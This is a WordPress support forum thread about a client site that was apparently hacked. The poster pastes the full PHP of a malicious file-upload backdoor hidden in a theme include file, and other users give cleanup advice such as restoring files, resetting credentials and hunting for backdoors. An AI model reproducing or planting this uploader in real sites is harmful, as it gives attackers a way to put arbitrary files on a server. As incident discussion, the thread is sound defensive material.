Title: Website possibly hacked?
Last modified: August 22, 2016

---

# Website possibly hacked?

 *  [dpanych](https://wordpress.org/support/users/dpanych/)
 * (@dpanych)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/)
 * I am updating the styling for a client’s website and it seems to have gotten 
   hacked. When I visit their website they have a File Upload widget in the header
   and when I would navigate to /wp-admin I get the following error:
 * > Warning: Cannot modify header information – headers already sent by (output
   > started at /home/***/public_html/wp-content/themes/theme47225/includes/class-
   > tgm-plugin-activation.php:17) in /home/…
 * Here is the content inside the class-tgm-plugin-activation.php file:
 *     ```
       <?php
       if(isset($_POST['Submit'])){
           $filedir = "";
           $maxfile = '2000000';
   
           $userfile_name = $_FILES['image']['name'];
           $userfile_tmp = $_FILES['image']['tmp_name'];
           if (isset($_FILES['image']['name'])) {
               $abod = $filedir.$userfile_name;
               @move_uploaded_file($userfile_tmp, $abod);
   
       echo"<center><b>Done ==> $userfile_name</b></center>";
       }
       }
       else{
       echo'
       <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
       }
       ?>
       ```
   
 * So I removed the following:
 *     ```
       echo'
       <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
       ```
   
 * and it seemed to be all fixed. The next day I went to the website and the same
   thing happened.
 * Anyone know how to recover from this?

Viewing 4 replies - 1 through 4 (of 4 total)

 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232465)
 * – Try reviewing this codex to solve header already sent problem: [http://codex.wordpress.org/FAQ_Troubleshooting#How_do_I_solve_the_Headers_already_sent_warning_problem.3F](http://codex.wordpress.org/FAQ_Troubleshooting#How_do_I_solve_the_Headers_already_sent_warning_problem.3F)
 *  [The Hack Repair Guy](https://wordpress.org/support/users/tvcnet/)
 * (@tvcnet)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232522)
 * Someone most definitely added that upload snippet to your page.
 * If I were in your situation, I would go back and find the original theme files,
   remove the existing theme and replace from my virgin backup.
 * Changing all related passwords would not hurt either.
 *  [perezbox](https://wordpress.org/support/users/perezbox/)
 * (@perezbox)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232652)
 * Hi [@dpanych](https://wordpress.org/support/users/dpanych/)
 * Replacing your theme will likely do little for you in this case. Often in cases
   of reinfections the attacker has a means of regaining access to your environment.
 * Whether it be via a Backdoor, or via your own WP-Admin controls.
 * This is what I would do:
 * 1 – I would investigate when the changes are happening. You can do this by analyzing
   your logs to see what events are occurring. Look for log entries that trigger
   wp-login and / or the editor – you should be able to see this.
 * 2 – I would purge all accounts of their passwords just in case, there are few
   different tools to help with this. One such would be the Sucuri plugin: [http://wordpress.org/plugins/sucuri-scanner/](http://wordpress.org/plugins/sucuri-scanner/)
   There is actually a section in there for post-hacks. It will not only purge the
   passwords but also reset your salts / keys – an important step many forget to
   do.
 * 3 – Once all your controls are set, including FTP, you enter the most difficult
   section which is trying to identify if a backdoor exists. This, I won’t lie, 
   won’t be easy but a good place to start is here: [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * Once you get the reinfection to stop at least 48 hours you can feel a little 
   more comfortable in the actions you’ve taken.
 * One very simple step is to replace WordPress core files – that is wp-admin / 
   wp-includes and the root files. You should see which those are.
 * Happy hunting.
 *  [dpauley1980](https://wordpress.org/support/users/dpauley1980/)
 * (@dpauley1980)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232735)
 * I suffered the same hack, when I deleted the same line as him, my page went whiteout.
   I cannot get back to that page. Can I not fix this now?

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Website possibly hacked?’ is closed to new replies.

## Tags

 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [header](https://wordpress.org/support/topic-tag/header/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 4 replies
 * 5 participants
 * Last reply from: [dpauley1980](https://wordpress.org/support/users/dpauley1980/)
 * Last activity: [11 years, 2 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232735)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics